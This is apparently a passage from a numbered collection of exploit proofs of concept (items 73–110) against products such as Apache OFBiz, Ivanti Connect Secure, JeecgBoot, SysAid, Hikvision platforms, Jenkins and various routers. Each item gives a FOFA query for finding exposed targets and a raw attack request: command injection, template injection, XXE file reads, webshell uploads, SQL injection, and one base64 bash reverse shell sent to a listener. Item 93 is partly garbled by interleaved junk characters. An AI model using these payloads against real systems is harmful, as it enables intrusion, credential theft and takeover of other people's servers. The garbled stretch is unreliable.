S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE O&M security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

* s3 p0 u( E( d/ L9 K93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
5 }, p' V. X4 wFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
  _1 E! `0 v0 a& TPOST /?g=app_av_import_save HTTP/1.1! ]+ ~. R& M# D0 w" V, f' |
Host: x.x.x.x
4 r) b* r4 F. ~3 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
% l: H1 ~# G9 GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- {4 t7 |  v7 v5 B5 W1 W/ R6 T6 C
------WebKitFormBoundarykcbkgdfx
' f3 N! U; ]5 b/ N; D/ Q& |Content-Disposition: form-data; name="MAX_FILE_SIZE". J7 W6 |4 e! `6 p8 m$ g4 v9 a
; b; \) M2 f. L5 a6 ]: \
10000000
& E9 g4 o0 P: ~0 @2 N' ^------WebKitFormBoundarykcbkgdfx/ ^' w8 \! P0 U, [, c5 k
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
/ S. |5 {. y1 D$ G1 aContent-Type: text/plain/ `/ B, O0 J3 D! b+ n
* h8 z; f; \3 O$ V3 \
wagletqrkwrddkthtulxsqrphulnknxa) g( X# @) o" Q. h
------WebKitFormBoundarykcbkgdfx# n2 W" p; t0 {8 q! R$ D
Content-Disposition: form-data; name="submit_post"7 w* R8 L3 `( n) {: \- }/ T3 u; `
& z# L$ \4 I, n! r0 d/ i
obj_app_upfile
/ |) |/ N7 i2 {% F0 r$ w------WebKitFormBoundarykcbkgdfx
0 Y- v: |1 b0 l2 RContent-Disposition: form-data; name="__hash__"$ ]1 f  }. {6 G1 S+ G

$ k  |0 D- b! q9 i( }0b9d6b1ab7479ab69d9f71b05e0e9445$ N& G+ g3 U) s, c/ K. f- G5 Q
------WebKitFormBoundarykcbkgdfx--
4 K# W/ h. J, O- U
! F) k" A1 s  {4 T! p
, r( d$ [, `# X7 h9 p: Q3 e  XGET /attachements/xlskxknxa.txt HTTP/1.1) z8 d! M0 u4 r5 Y4 R% z! K' O
Host: xx.xx.xx.xx8 K: [5 D: B. h( Y1 {9 G% C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 a1 s" ?7 v# A
! W) \' D  I7 h& c

94. QiAnXin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Replace the placeholder in the POC above with the generated payload:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD smart recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
